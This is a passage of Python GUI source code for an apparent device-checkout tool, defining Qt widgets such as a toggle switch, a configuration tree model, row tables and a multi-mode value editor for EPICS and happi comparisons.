):\n super().__init__(*args, parent=parent, **kwargs)\n # Save our properties on the object via self, so we can access them later\n # in the paintEvent.\n self.checked_color = checked_color\n self.checked_icon = checked_icon\n self.unchecked_icon = unchecked_icon\n self._bar_brush = QBrush(bar_color)\n self._bar_checked_brush = QBrush(QColor(checked_color).lighter())\n\n self._handle_brush = QBrush(handle_color)\n self._handle_checked_brush = QBrush(QColor(checked_color))\n\n # Setup the rest of the widget.\n\n self.setContentsMargins(0, 0, 0, 0)\n self._handle_position = 0\n\n self.stateChanged.connect(self.handle_state_change)\n\n def sizeHint(self) -> QtCore.QSize:\n return QtCore.QSize(40, 25)\n\n def hitButton(self, pos: QPoint):\n return self.contentsRect().contains(pos)\n\n def paintEvent(self, e: QPaintEvent):\n contRect = self.contentsRect()\n handleRadius = round(0.45 * contRect.height())\n\n p = QPainter(self)\n p.setRenderHint(QPainter.Antialiasing)\n\n p.setPen(self._transparent_pen)\n barRect = QRectF(\n 0, 0,\n contRect.width() - handleRadius, 0.40 * contRect.height()\n )\n barRect.moveCenter(contRect.center())\n rounding = barRect.height() / 2\n\n # the handle will move along this line\n trailLength = contRect.width() - 2 * handleRadius\n xPos = contRect.x() + handleRadius + trailLength * self._handle_position\n iconRad = int(0.7 * handleRadius)\n # center of handle\n icon_x = int(xPos - (1.3 * handleRadius) + (1.3 * iconRad))\n iconRect = QRect(\n QPoint(icon_x, round(barRect.center().y()) - iconRad),\n QSize(2 * iconRad, 2 * iconRad)\n )\n\n if self.isChecked():\n p.setBrush(self._bar_checked_brush)\n p.drawRoundedRect(barRect, rounding, rounding)\n p.setBrush(self._handle_checked_brush)\n p.drawEllipse(\n QPointF(xPos, barRect.center().y()),\n handleRadius, handleRadius\n )\n icon = qta.icon(self.checked_icon,\n color=QColor(self.checked_color).darker())\n icon.paint(p, iconRect)\n\n else:\n p.setBrush(self._bar_brush)\n p.drawRoundedRect(barRect, rounding, rounding)\n p.setPen(self._light_grey_pen)\n p.setBrush(self._handle_brush)\n p.drawEllipse(\n QPointF(xPos, barRect.center().y()),\n handleRadius, handleRadius\n )\n icon = qta.icon(self.unchecked_icon)\n icon.paint(p, iconRect)\n\n p.end()\n\n @QtCore.Slot(int)\n def handle_state_change(self, value):\n self._handle_position = 1 if value else 0\n\n @QtCore.Property(float)\n def handle_position(self):\n return self._handle_position\n\n @handle_position.setter\n def handle_position(self, pos):\n \"\"\"change the property\n we need to trigger QWidget.update() method, either by:\n 1- calling it here [ what we're doing ].\n 2- connecting the QPropertyAnimation.valueChanged() signal to it.\n \"\"\"\n self._handle_position = pos\n self.update()\n\n\ndef user_string_to_bool(text: str) -> bool:\n \"\"\"\n Interpret a user's input as a boolean value.\n\n Strings like \"true\" should evaluate to True, strings\n like \"fa\" should evaluate to False, numeric inputs like\n 1 or 2 should evaluate to True, numeric inputs like 0 or\n 0.0 should evaluate to False, etc.\n\n Parameters\n ----------\n text : str\n The user's text input as a string. This is usually\n the value directly from a line edit widget.\n \"\"\"\n if not text:\n return False\n try:\n if text[0].lower() in ('n', 'f', '0'):\n return False\n except (IndexError, AttributeError):\n # Not a string, let's be slightly helpful\n return bool(text)\n return True\n\n\ndef setup_line_edit_data(\n line_edit: QLineEdit,\n value_obj: QDataclassValue,\n from_str: Callable[[str], Any],\n to_str: Callable[[Any], str],\n) -> None:\n \"\"\"\n Setup a line edit for bilateral data exchange with a bridge.\n\n Parameters\n ----------\n line_edit : QLineEdit\n The line edit to set up.\n value_obj : QDataclassValue\n The bridge member that has the value we care about.\n from_str : callable\n A callable from str to the dataclass value. This is used\n to interpret the contents of the line edit.\n to_str : callable\n A callable from the dataclass value to str. This is used\n to fill the line edit when the dataclass updates.\n \"\"\"\n def update_dataclass(text: str) -> None:\n try:\n value = from_str(text)\n except ValueError:\n return\n value_obj.put(value)\n\n def update_widget(value: Any) -> None:\n if not line_edit.hasFocus():\n try:\n text = to_str(value)\n except ValueError:\n return\n line_edit.setText(text)\n\n starting_value = value_obj.get()\n starting_text = to_str(starting_value)\n line_edit.setText(starting_text)\n line_edit.textEdited.connect(update_dataclass)\n value_obj.changed_value.connect(update_widget)\n\n\ndef describe_comparison_context(attr: str, config: Configuration) -> str:\n \"\"\"\n Describe in words what value or values we are comparing to.\n\n Parameters\n ----------\n attr : str\n The attribute, pvname, or other string identifier we are going\n to compare to. This can also be 'shared'.\n config : Configuration\n Typically a DeviceConfiguration, PVConfiguration, or\n ToolConfiguration that has the contextual information for\n understanding attr.\n \"\"\"\n if not attr:\n return 'Error loading context information'\n if isinstance(config, DeviceConfiguration):\n num_devices = len(config.devices)\n if num_devices == 0:\n return 'Invalid comparison to zero devices'\n if attr == 'shared':\n num_signals = len(config.by_attr)\n if num_signals == 0:\n return 'Invalid comparison to zero signals'\n if num_devices == 1 and num_signals == 1:\n # device_name.signal_name\n return (\n f'Comparison to value of {config.devices[0]}.'\n f'{list(config.by_attr)[0]}'\n )\n if num_devices > 1 and num_signals == 1:\n return (\n f'Comparison to value of {list(config.by_attr)[0]} '\n f'signal on each of {num_devices} devices'\n )\n if num_devices == 1 and num_signals > 1:\n return (\n f'Comparison to value of {num_signals} '\n f'signals on {config.devices[0]}'\n )\n return (\n f'Comparison to value of {num_signals} signals '\n f'on each of {num_devices} devices'\n )\n # Must be one specific signal\n if num_devices == 1:\n # device_name.signal_name\n return f'Comparison to value of {config.devices[0]}.{attr}'\n return (\n f'Comparison to value of {attr} '\n f'on each of {num_devices} devices'\n )\n if isinstance(config, PVConfiguration):\n if attr == 'shared':\n num_pvs = len(config.by_pv)\n if num_pvs == 0:\n return 'Invalid comparison to zero PVs'\n if num_pvs == 1:\n return f'Comparison to value of {list(config.by_pv)[0]}'\n return f'Comparison to value of each of {num_pvs} pvs'\n return f'Comparison to value of {attr}'\n if isinstance(config, ToolConfiguration):\n if isinstance(config.tool, Ping):\n num_hosts = len(config.tool.hosts)\n if num_hosts == 0:\n return 'Invalid comparison to zero ping hosts'\n if attr == 'shared':\n if num_hosts == 1:\n return (\n 'Comparison to all different results from pinging '\n f'{config.tool.hosts[0]}'\n )\n return (\n 'Comparison to all different results from pinging '\n f'{num_hosts} hosts'\n )\n if num_hosts == 1:\n return (\n f'Comparison to {attr} result '\n f'from pinging {config.tool.hosts[0]}'\n )\n return (\n f'Comparison to {attr} result from pinging {num_hosts} hosts'\n )\n return 'Comparison to unknown tool results'\n return 'Invalid comparison'\n\n\ndef describe_step_context(attr: str, step: ProcedureStep) -> str:\n # TODO: actually write this method\n # may not need attr, since ProcedureSteps are flatter\n # Will have to be expanded with each new step type\n return ''\n\n\ndef get_relevant_pvs(\n attr: str,\n config: Configuration\n) -> List[Tuple[str, str]]:\n \"\"\"\n Get the pvs and corresponding attribute name for the provided comparison.\n\n Parameters\n ----------\n attr : str\n The attribute, pvname or other string identifier to compare to.\n This can also be 'shared'\n config : Configuration\n Typically a DeviceConfiguration, PVConfiguration, or\n ToolConfiguration that has the contextual information for\n understanding attr.\n Returns\n -------\n List[Tuple[str, str]]\n A list of tuples (PV:NAME, device.attr.name) containing the\n relevant pv information\n \"\"\"\n if isinstance(config, PVConfiguration):\n # we have raw PV's here, with no attrs\n return [(pv, None) for pv in config.by_pv.keys()]\n if isinstance(config, DeviceConfiguration):\n pv_list = []\n if attr == 'shared':\n # Use all pvs in the config\n attrs = config.by_attr.keys()\n else:\n attrs = list([attr])\n for device_name in config.devices:\n dev = util.get_happi_device_by_name(device_name)\n for curr_attr in attrs:\n try:\n pv = getattr(getattr(dev, curr_attr), 'pvname', None)\n except AttributeError:\n continue\n if pv:\n pv_list.append((pv, device_name + '.' + curr_attr))\n\n return pv_list\n\n\ndef cast_dataclass(data: Any, new_type: Type) -> Any:\n \"\"\"\n Convert one dataclass to another, keeping values in any same-named fields.\n\n Parameters\n ----------\n data : Any dataclass instance\n The dataclass instance that we'd like to convert.\n new_type : Any dataclass\n The dataclass type that we'd like to convert.\n\n Returns\n -------\n casted_data : instance of new_type\n The new dataclass instance.\n \"\"\"\n data_fields = dataclasses.fields(data)\n new_fields = dataclasses.fields(new_type)\n field_names = set(field.name for field in new_fields)\n new_kwargs = {\n dfield.name: getattr(data, dfield.name) for dfield in data_fields\n if dfield.name in field_names\n }\n return new_type(**new_kwargs)\n\n\nclass MultiInputDialog(QtWidgets.QDialog):\n \"\"\"\n Generates a dialog widget for requesting an arbitrary number of\n pieces of information. Selects the input widget type based on the\n initial data type.\n\n To retrieve the user provided data, call MultiInputDialog.get_info()\n \"\"\"\n def __init__(\n self,\n *args,\n init_values: Dict[str, Any],\n units: Optional[List[str]] = None,\n **kwargs\n ):\n super().__init__(*args, **kwargs)\n\n self.init_values = init_values\n self.units = units\n vlayout = QtWidgets.QVBoxLayout(self)\n self.grid_layout = QtWidgets.QGridLayout()\n # add each name and field\n for i, (key, value) in enumerate(init_values.items()):\n spaced_key = key.replace('_', ' ')\n self.grid_layout.addWidget(self.make_label(spaced_key), i, 0)\n self.grid_layout.addWidget(self.make_field(value), i, 1)\n if self.units:\n try:\n unit_label = QtWidgets.QLabel(self.units[i])\n except IndexError:\n continue\n self.grid_layout.addWidget(unit_label, i, 2)\n\n vlayout.addLayout(self.grid_layout)\n\n # add ok, cancel buttons\n self.button_box = QtWidgets.QDialogButtonBox(\n QtWidgets.QDialogButtonBox.Ok | QtWidgets.QDialogButtonBox.Cancel\n )\n self.ok_button = self.button_box.button(QtWidgets.QDialogButtonBox.Ok)\n self.cancel_button = self.button_box.button(QtWidgets.QDialogButtonBox.Cancel)\n\n vlayout.addWidget(self.button_box)\n self.ok_button.clicked.connect(self.accept)\n self.cancel_button.clicked.connect(self.reject)\n\n def make_label(self, key: str) -> QtWidgets.QLabel:\n return QtWidgets.QLabel(key)\n\n def make_field(self, value: Any) -> QtWidgets.QWidget:\n \"\"\"\n Make an input field widget for the given value based on its type\n\n Parameters\n ----------\n value : Any\n The default value to make a input field for\n\n Returns\n -------\n QtWidgets.QWidget\n The input field widget\n \"\"\"\n # no newlines allowed\n regexp = QRegularExpression(r'[^\\n]*')\n if isinstance(value, str):\n # make text edit\n text_edit = QtWidgets.QLineEdit()\n validator = QRegularExpressionValidator(regexp)\n text_edit.setMaximumHeight(30)\n text_edit.setPlaceholderText(value)\n text_edit.setValidator(validator)\n return text_edit\n elif isinstance(value, int):\n int_edit = QtWidgets.QSpinBox()\n int_edit.setMinimum(-1)\n int_edit.setSpecialValueText('None')\n int_edit.setToolTip('Input -1 to set value to None')\n int_edit.setValue(value)\n return int_edit\n elif isinstance(value, float):\n float_edit = QtWidgets.QDoubleSpinBox()\n float_edit.setMinimum(-1)\n float_edit.setSpecialValueText('None')\n float_edit.setToolTip('Input -1 to set value to None')\n float_edit.setValue(value)\n return float_edit\n else:\n raise RuntimeError(f\"Unexpected value {value} of type {type(value).__name__}\")\n\n def get_info(self) -> Dict[str, Any]:\n \"\"\"\n Collect user provided information. Returns default values\n provided to the widget at initialization if the user has not\n entered any data.\n \"\"\"\n info = {}\n for r in range(self.grid_layout.rowCount()):\n key = self.grid_layout.itemAtPosition(r, 0).widget().text()\n input_widget = self.grid_layout.itemAtPosition(r, 1).widget()\n if isinstance(input_widget, QtWidgets.QLineEdit):\n value = input_widget.text()\n elif isinstance(input_widget,\n (QtWidgets.QSpinBox, QtWidgets.QDoubleSpinBox)):\n value = input_widget.value()\n\n unspaced_key = key.replace(' ', '_')\n # replace with default value if no input\n info[unspaced_key] = value or self.init_values[unspaced_key]\n\n return info\n\n\ndef clear_results(config_file: PreparedFile | ProcedureFile) -> None:\n if isinstance(config_file, ProcedureFile):\n # clear all results when making a new run tree\n for step in walk_steps(config_file.root):\n step.step_result = incomplete_result()\n step.verify_result = incomplete_result()\n step.combined_result = incomplete_result()\n\n elif isinstance(config_file, PreparedFile):\n for comp in config_file.walk_comparisons():\n comp.result = incomplete_result()\n for group in config_file.walk_groups():\n group.result = incomplete_result()\n\n\nclass ConfigTreeModel(QtCore.QAbstractItemModel):\n \"\"\"\n Item model for tree data. Goes through all this effort due to the need for\n tooltips, icons, etc. This model is READ-ONLY, and does not implement\n the ``setData`` method.\n\n Expects the item to be specifically a TreeItem, which each holds a\n Configuration or Comparison\n \"\"\"\n def __init__(self, *args, data: TreeItem, **kwargs):\n super().__init__(*args, **kwargs)\n self.tree_data = data or TreeItem()\n self.root_item = self.tree_data\n self.headers = ['Name', 'Status', 'Type']\n\n def headerData(\n self,\n section: int,\n orientation: Qt.Orientation,\n role: int\n ) -> Any:\n \"\"\"\n Returns the header data for the model.\n Currently only displays horizontal header data\n\n Parameters\n ----------\n section : int\n section to provide header information for\n orientation : Qt.Orientation\n header orientation, Qt.Horizontal or Qt.Vertical\n role : int\n Qt role to provide header information for\n\n Returns\n -------\n Any\n requested header data\n \"\"\"\n if role != Qt.DisplayRole:\n return\n\n if orientation == Qt.Horizontal:\n return self.headers[section]\n\n def index(\n self,\n row: int,\n column: int,\n parent: QtCore.QModelIndex = None\n ) -> QtCore.QModelIndex:\n \"\"\"\n Returns the index of the item in the model.\n\n In a tree view the rows are defined relative to parent item. If an\n item is the first child under its parent, it will have row=0,\n regardless of the number of items in the tree.\n\n Parameters\n ----------\n row : int\n The row of the requested index.\n column : int\n The column of the requested index\n parent : QtCore.QModelIndex, optional\n The parent of the requested index, by default None\n\n Returns\n -------\n QtCore.QModelIndex\n \"\"\"\n if not self.hasIndex(row, column, parent):\n return QtCore.QModelIndex()\n\n parent_item = None\n if not parent or not parent.isValid():\n parent_item = self.root_item\n else:\n parent_item = parent.internalPointer()\n\n child_item = parent_item.child(row)\n if child_item:\n return self.createIndex(row, column, child_item)\n\n # all else\n return QtCore.QModelIndex()\n\n def parent(self, index: QtCore.QModelIndex) -> QtCore.QModelIndex:\n \"\"\"\n Returns the parent of the given model item.\n\n Parameters\n ----------\n index : QtCore.QModelIndex\n item to retrieve parent of\n\n Returns\n -------\n QtCore.QModelIndex\n index of the parent item\n \"\"\"\n if not index.isValid():\n return QtCore.QModelIndex()\n child = index.internalPointer()\n parent = child.parent()\n if parent == self.root_item:\n return QtCore.QModelIndex()\n\n return self.createIndex(parent.row(), 0, parent)\n\n def rowCount(self, parent: QtCore.QModelIndex) -> int:\n \"\"\"\n Called by tree view to determine number of children an item has.\n\n Parameters\n ----------\n parent : QtCore.QModelIndex\n index of the parent item being queried\n\n Returns\n -------\n int\n number of children ``parent`` has\n \"\"\"\n if not parent.isValid():\n parent_item = self.root_item\n else:\n parent_item = parent.internalPointer()\n return parent_item.childCount()\n\n def columnCount(self, parent: QtCore.QModelIndex) -> int:\n \"\"\"\n Called by tree view to determine number of columns of data ``parent`` has\n\n Parameters\n ----------\n parent : QtCore.QModelIndex\n\n Returns\n -------\n int\n number of columns ``parent`` has\n \"\"\"\n if not parent.isValid():\n parent_item = self.root_item\n else:\n parent_item = parent.internalPointer()\n return parent_item.columnCount()\n\n def data(self, index: QtCore.QModelIndex, role: int) -> Any:\n \"\"\"\n Returns the data stored under the given ``role`` for the item\n referred to by the ``index``. Uses and assumes ``TreeItem`` methods.\n\n Parameters\n ----------\n index : QtCore.QModelIndex\n index that identifies the portion of the model in question\n role : int\n the data role\n\n Returns\n -------\n Any\n The data to be displayed by the model\n \"\"\"\n if not index.isValid():\n return None\n\n item = index.internalPointer()\n # special handling for status info\n if index.column() == 1:\n if role == Qt.ForegroundRole:\n brush = QBrush()\n brush.setColor(item.data(index.column())[1])\n return brush\n if role == Qt.DisplayRole:\n return item.data(1)[0]\n if role == Qt.TextAlignmentRole:\n return Qt.AlignCenter\n\n if role == Qt.ToolTipRole:\n return item.tooltip()\n if role == Qt.DisplayRole:\n return item.data(index.column())\n\n return None\n\n\nclass TreeItem:\n \"\"\"\n Node in a tree representation of a passive checkout.\n\n Each node takes a Configuration or Comparison, and provides ``ConfigTreeModel``\n information from it.\n\n If ``prepared_data`` is provided, Result information can be provided to the\n model via the ``.data()`` method\n \"\"\"\n result_icon_map = {\n # check mark\n Severity.success: ('\\u2713', QColor(0, 128, 0, 255)),\n Severity.warning : ('?', QColor(255, 165, 0, 255)),\n # x mark\n Severity.internal_error: ('\\u2718', QColor(255, 0, 0, 255)),\n Severity.error: ('\\u2718', QColor(255, 0, 0, 255))\n }\n\n def __init__(\n self,\n data: Union[Configuration, Comparison],\n prepared_data: Optional[List[PreparedConfiguration, PreparedComparison]] = None\n ) -> None:\n self._data = data\n self.prepared_data = prepared_data\n self.combined_result = None\n self._columncount = 3\n self._children: List[TreeItem] = []\n self._parent = None\n self._row = 0\n\n def data(self, column: int) -> Any:\n \"\"\"\n Return the data for the requested column.\n Column 0: name\n Column 1: (status icon, color)\n Column 2: type\n\n Parameters\n ----------\n column : int\n data column requested\n\n Returns\n -------\n Any\n \"\"\"\n if column == 0:\n return self._data.name\n elif column == 1:\n if self.prepared_data:\n prep_results = [d.result for d in self.prepared_data]\n self.combined_result = combine_results(prep_results)\n icon_data = self.result_icon_map[self.combined_result.severity]\n return icon_data\n else:\n return self.result_icon_map[Severity.internal_error]\n elif column == 2:\n return type(self._data).__name__\n\n def tooltip(self) -> str:\n \"\"\" Construct the tooltip based on the stored result \"\"\"\n if self.combined_result:\n reason = self.combined_result.reason\n return reason.strip('[]').replace(', ', '\\n')\n return ''\n\n def columnCount(self) -> int:\n \"\"\" Return the item's column count \"\"\"\n return self._columncount\n\n def childCount(self) -> int:\n \"\"\" Return the item's child count \"\"\"\n return len(self._children)\n\n def child(self, row: int) -> TreeItem:\n \"\"\" Return the item's child \"\"\"\n if row >= 0 and row < self.childCount():\n return self._children[row]\n\n def parent(self) -> TreeItem:\n \"\"\" Return the item's parent \"\"\"\n return self._parent\n\n def row(self) -> int:\n \"\"\" Return the item's row under its parent \"\"\"\n return self._row\n\n def addChild(self, child: TreeItem) -> None:\n \"\"\"\n Add a child to this item.\n\n Parameters\n ----------\n child : TreeItem\n Child TreeItem to add to this TreeItem\n \"\"\"\n child._parent = self\n child._row = len(self._children)\n self._children.append(child)\n self._columncount = max(child.columnCount(), self._columncount)\n\n\nclass AddRowWidget(DesignerDisplay, QWidget):\n \"\"\"\n A simple row widget with an add button. To be used when space is precious\n Connect a new-row slot to the add_button signal to create new rows\n \"\"\"\n filename = 'add_row_widget.ui'\n\n add_button: QtWidgets.QToolButton\n row_label: QtWidgets.QLabel\n\n def __init__(self, *args, text='Add new row', **kwargs):\n super().__init__(*args, **kwargs)\n self.add_button.setIcon(qta.icon('ri.add-circle-line'))\n self.row_label.setText(text)\n\n\nclass TableWidgetWithAddRow(QtWidgets.QTableWidget):\n \"\"\"\n A standard QTableWidget with an AddRowWidget.\n Intended to be a n x 1 table, with each row being a SimpleRowWidget.\n allows drag-and-drop to re-order rows\n Emits table_updated when the table contents change.\n\n use .add_row() to initialize a new row with an optional dataclass.\n\n The AddRowWidget is not treated as a row, and as such the following methods\n are modified.\n - rowCount(): Returns super().rowCount() - 1\n - ... and more as I find more methods\n \"\"\"\n # TODO: try setting up drag-drop functionality at some point.\n add_row_widget: AddRowWidget\n\n table_updated: ClassVar[QtCore.Signal] = QtCore.Signal()\n row_interacted: ClassVar[QtCore.Signal] = QtCore.Signal(int)\n\n def __init__(self, *args, add_row_text: str, title_text: str, row_widget_cls: QtWidgets.QWidget, **kwargs):\n super().__init__(*args, **kwargs)\n\n # self.dropEvent = self.table_drop_event\n self.setColumnCount(1)\n self.horizontalHeader().setStretchLastSection(True)\n self.setHorizontalHeaderLabels([title_text])\n self.verticalHeader().setHidden(True)\n self.row_widget_cls = row_widget_cls\n self.add_row_text = add_row_text\n self.add_add_row_widget(text=add_row_text)\n self.setSelectionMode(self.NoSelection)\n self.table_updated.connect(self.stash_row_numbers)\n self.row_interacted.connect(lambda row_num: self.selectRow(row_num))\n\n def add_add_row_widget(self, text: str):\n \"\"\" add the AddRowWidget to the end of the specified table-widget\"\"\"\n self.add_row_widget = AddRowWidget(text=text)\n self.insertRow(0)\n self.setRowHeight(0, self.add_row_widget.sizeHint().height())\n self.setCellWidget(0, 0, self.add_row_widget)\n self.add_row_widget.add_button.clicked.connect(self.add_row)\n\n def rowCount(self) -> int:\n # exclude add-row in row counts\n return super().rowCount() - 1\n\n def add_row(\n self,\n checked: bool = False,\n data: Optional[Any] = None,\n **kwargs\n ) -> None:\n \"\"\"\n add a new or existing action to the table.\n\n Parameters\n ----------\n checked : bool, optional\n Unused. Button \"clicked\" signals often pass this as the first\n positional argument, by default False\n data : Optional[Any], optional\n a Dataclass to initialize the row with, by default None\n used in initializing the table, not in callbacks\n \"\"\"\n new_row = self.row_widget_cls(data=data)\n # Insert just above the add-row-row\n ins_ind = self.rowCount()\n self.insertRow(ins_ind)\n self.setRowHeight(ins_ind, new_row.sizeHint().height())\n self.setCellWidget(ins_ind, 0, new_row)\n self.setup_delete_button(new_row)\n self.table_updated.emit()\n\n def setup_delete_button(self, row: QtWidgets.QWidget) -> None:\n \"\"\"\n Set up the delete button for the specified row. Assumes `row.delete_button`\n is a QPushButton\n\n Parameters\n ----------\n row : QtWidgets.QWidget\n A row widget with a QPushButton in the .delete_button field\n \"\"\"\n # row: SimpleRowWidget, but can't import due to module structure\n delete_icon = self.style().standardIcon(\n QtWidgets.QStyle.SP_TitleBarCloseButton\n )\n row.delete_button.setIcon(delete_icon)\n\n def inner_delete(*args, **kwargs):\n self.delete_table_row(row)\n\n row.delete_button.clicked.connect(inner_delete)\n\n def delete_table_row(self, row: QtWidgets.QWidget) -> None:\n \"\"\" slot for a row's delete button. Removes it from this table. \"\"\"\n # get the data\n for row_index in range(self.rowCount()):\n widget = self.cellWidget(row_index, 0)\n if widget is row:\n self.removeRow(row_index)\n break\n\n self.table_updated.emit()\n\n def stash_row_numbers(self, *args, **kwargs):\n \"\"\" Stash row numbers in row widgets \"\"\"\n for row_num in range(self.rowCount()):\n row_widget = self.cellWidget(row_num, 0)\n row_widget.row_num = row_num\n\n def clearContents(self):\n super().clearContents()\n self.setRowCount(0)\n self.add_add_row_widget(text=self.add_row_text)\n\n\ndef set_widget_font_size(widget: QWidget, size: int):\n font = widget.font()\n font.setPointSize(size)\n widget.setFont(font)\n\n\ndef valid_float_string(string):\n try:\n float(string)\n except ValueError:\n return False\n return True\n\n\nclass ScientificDoubleSpinBox(QDoubleSpinBox):\n \"\"\"\n A double spinbox that supports scientific notation\n Thanks to jdreaver (https://gist.github.com/jdreaver/0be2e44981159d0854f5)\n for doing the hard work\n \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.setMinimum(-np.inf)\n self.setMaximum(np.inf)\n self.setDecimals(1000)\n\n def validate(self, text, position):\n if valid_float_string(text):\n return (QValidator.Acceptable, text, position)\n if text == \"\" or text[position-1] in 'e.-+':\n return (QValidator.Intermediate, text, position)\n return (QValidator.Invalid, text, position)\n\n def fixup(self, text):\n try:\n value = float(text)\n except ValueError:\n return \"\"\n return value\n\n def valueFromText(self, text):\n return float(text)\n\n def textFromValue(self, value):\n return str(float(value))\n\n def stepBy(self, steps):\n text = self.cleanText()\n if 'e' in text:\n decimal, exp = text.split('e')\n else:\n decimal = text\n exp = None\n decimal = float(decimal)\n decimal += steps\n new_string = \"{:g}\".format(decimal) + (f'e{exp}' if exp else \"\")\n self.lineEdit().setText(new_string)\n\n\nclass EditMode(IntEnum):\n BOOL = 0\n ENUM = 1\n FLOAT = 2\n INT = 3\n STR = 4\n EPICS = 5\n HAPPI = 6\n\n\nclass MultiModeValueEdit(DesignerDisplay, QWidget):\n \"\"\"\n Widget to edit a single value/dynamic value pair. This widget contains a\n set of various edit widgets that will be connected to the corresponding\n QDataclassValue instances as appropriate. On first load we will match the\n data type of the saved value (or of the default value). The user will be\n able to pick a different input method via the mode select button and the\n appropriate input widget will be shown. This is intended to be used to\n edit the \"value\" and \"dynamic_value\" attributes of \"Comparison\" classes and\n of similar constructs. Some of the modes will edit the \"dynamic_value\" and\n others will edit the plain normal \"value\".\n\n Parameters\n ----------\n bridge : QDataclassBridge\n The bridge to the \"Comparison\" data class.\n value_name : str, optional\n The attribute name of the static value to edit.\n Defaults to \"value\".\n dynamic_name : str, optional\n The attribute name of the dynamic value to edit.\n Defaults = \"value_dynamic\".\n ids : QDataclassValue, optional\n The value object that will give us the list of ids (pvnames, devices)\n that are active for this comparison. This is needed to establish enum\n options.\n devices : QDataclassValue, optional\n The value object that will contain the list of device names if this is\n part of a device config. This is needed to establish enum options. If\n omitted, we'll treat ids as a list of PVs.\n font_pt_size : int, optional\n The size of the font to use for the widget.\n \"\"\"\n filename = 'multi_mode_value_edit.ui'\n show_tolerance: ClassVar[QSignal] = QSignal(bool)\n refreshed: ClassVar[QSignal] = QSignal()\n\n # Input widgets\n select_mode_button: QToolButton\n bool_input: QComboBox\n enum_input: QComboBox\n epics_widget: QWidget\n epics_input: QLineEdit\n epics_value_preview: QLabel\n epics_refresh: QToolButton\n happi_widget: QWidget\n happi_select_component: QPushButton\n happi_value_preview: QLabel\n happi_refresh: QToolButton\n float_input: ScientificDoubleSpinBox\n int_input: QSpinBox\n str_input: QLineEdit\n\n # metadata\n bridge: QDataclassBridge\n value_name: str\n value: QDataclassValue\n dynamic_name: str\n dynamic_value: QDataclassValue\n dynamic_bridge: Optional[QDataclassBridge]\n ids: Optional[QDataclassValue]\n devices: Optional[QDataclassValue]\n happi_select_widget: Optional[HappiDeviceComponentWidget]\n _last_device_name: str\n _is_number: bool\n _prep_dynamic_thread: Optional[ThreadWorker]\n\n def __init__(\n self,\n bridge: QDataclassBridge,\n value_name: str = 'value',\n dynamic_name: str = 'value_dynamic',\n id_fn: Optional[Callable] = None,\n devices: Optional[list[str]] = None,\n font_pt_size: int = 8,\n **kwargs,\n ):\n super().__init__(**kwargs)\n self.bridge = bridge\n self.value_name = value_name\n self.value = getattr(bridge, value_name)\n self.dynamic_name = dynamic_name\n self.dynamic_value = getattr(bridge, dynamic_name)\n self.dynamic_bridge = None\n self.id_fn = id_fn\n self.ids = self.id_fn()\n self.devices = devices\n self.font_pt_size = font_pt_size\n self.happi_select_widget = None\n self._last_device_name = \"\"\n self._is_number = False\n self._show_tol = False\n self._prep_dynamic_thread = None\n self._partial_slots: list[WeakPartialMethodSlot] = []\n self.setup_widgets()\n self.set_mode_from_data()\n self.setSizePolicy(\n QSizePolicy(\n QSizePolicy.Maximum,\n QSizePolicy.Maximum,\n )\n )\n\n def setup_widgets(self):\n \"\"\"\n Connect widgets to edit data classes as appropriate.\n \"\"\"\n # Data connections and style\n self.bool_input.activated.connect(self.update_from_bool)\n self.enum_input.activated.connect(self.update_from_enum)\n self.epics_input.textEdited.connect(self.update_from_epics)\n self.epics_refresh.clicked.connect(self.update_epics_preview)\n self.setup_refresh_icon(self.epics_refresh)\n self.happi_select_component.clicked.connect(self.select_happi_cpt)\n self.happi_refresh.clicked.connect(self.update_happi_preview)\n self.setup_refresh_icon(self.happi_refresh)\n self.float_input.valueChanged.connect(self.update_from_float)\n self.int_input.valueChanged.connect(self.update_normal)\n self.str_input.textEdited.connect(self.update_normal)\n\n # Data Validators\n self.epics_input.setValidator(PV_validator)\n\n for widget in self.children():\n if hasattr(widget, \"font\"):\n set_widget_font_size(widget, self.font_pt_size)\n\n # Hide bool/str if \"Number\" annotation.\n for field in fields(self.bridge.data):\n if field.name == self.value_name:\n if field.type in (\n Number,\n \"Number\",\n Optional[Number],\n \"Optional[Number]\",\n ):\n self._is_number = True\n break\n\n # Select mode\n menu = QMenu()\n if not self._is_number:\n use_bool = menu.addAction(\"&Bool\")\n bool_slot = WeakPartialMethodSlot(use_bool, use_bool.triggered,\n self.set_mode, EditMode.BOOL)\n self._partial_slots.append(bool_slot)\n use_enum = menu.addAction(\"&Enum\")\n enum_slot = WeakPartialMethodSlot(use_enum, use_enum.triggered,\n self.set_mode, EditMode.ENUM)\n self._partial_slots.append(enum_slot)\n use_float = menu.addAction(\"&Float\")\n float_slot = WeakPartialMethodSlot(use_float, use_float.triggered,\n self.set_mode, EditMode.FLOAT)\n self._partial_slots.append(float_slot)\n use_int = menu.addAction(\"&Int\")\n int_slot = WeakPartialMethodSlot(use_int, use_int.triggered,\n self.set_mode, EditMode.INT)\n self._partial_slots.append(int_slot)\n if not self._is_number:\n use_str = menu.addAction(\"&String\")\n str_slot = WeakPartialMethodSlot(use_str, use_str.triggered,\n self.set_mode, EditMode.STR)\n self._partial_slots.append(str_slot)\n use_epics = menu.addAction(\"EPI&CS\")\n epics_slot = WeakPartialMethodSlot(use_epics, use_epics.triggered,\n self.set_mode, EditMode.EPICS)\n self._partial_slots.append(epics_slot)\n use_happi = menu.addAction(\"&Happi\")\n happi_slot = WeakPartialMethodSlot(use_happi, use_happi.triggered,\n self.set_mode, EditMode.HAPPI)\n self._partial_slots.append(happi_slot)\n self.select_mode_button.setMenu(menu)\n self.select_mode_button.setPopupMode(\n self.select_mode_button.InstantPopup\n )\n\n def setup_refresh_icon(self, button: QToolButton):\n \"\"\"\n Assign the refresh icon to a QToolButton.\n \"\"\"\n icon = self.style().standardIcon(QStyle.SP_BrowserReload)\n button.setIcon(icon)\n\n def update_from_bool(self, index: int) -> None:\n \"\"\"\n When the bool widget is updated by the user, save a boolean.\n \"\"\"\n self.value.put(bool(index))\n\n def update_from_enum(self, index: int) -> None:\n \"\"\"\n When the enum widget is updated by the user, save a string.\n \"\"\"\n text = self.enum_input.itemText(index)\n self.value.put(text)\n\n def update_from_float(self, value: float) -> None:\n \"\"\"\n When the float widget is updated by the user, save a float.\n \"\"\"\n self.value.put(float(value))\n\n def update_normal(self, value: Any) -> None:\n \"\"\"\n Catch-all for updates that are already correct.\n These are cases where no preprocessing of value is needed.\n \"\"\"\n match_line_edit_text_width(self.str_input, text=str(value),\n minimum=50, buffer=10)\n self.value.put(value)\n\n def update_from_epics(self, text: str) 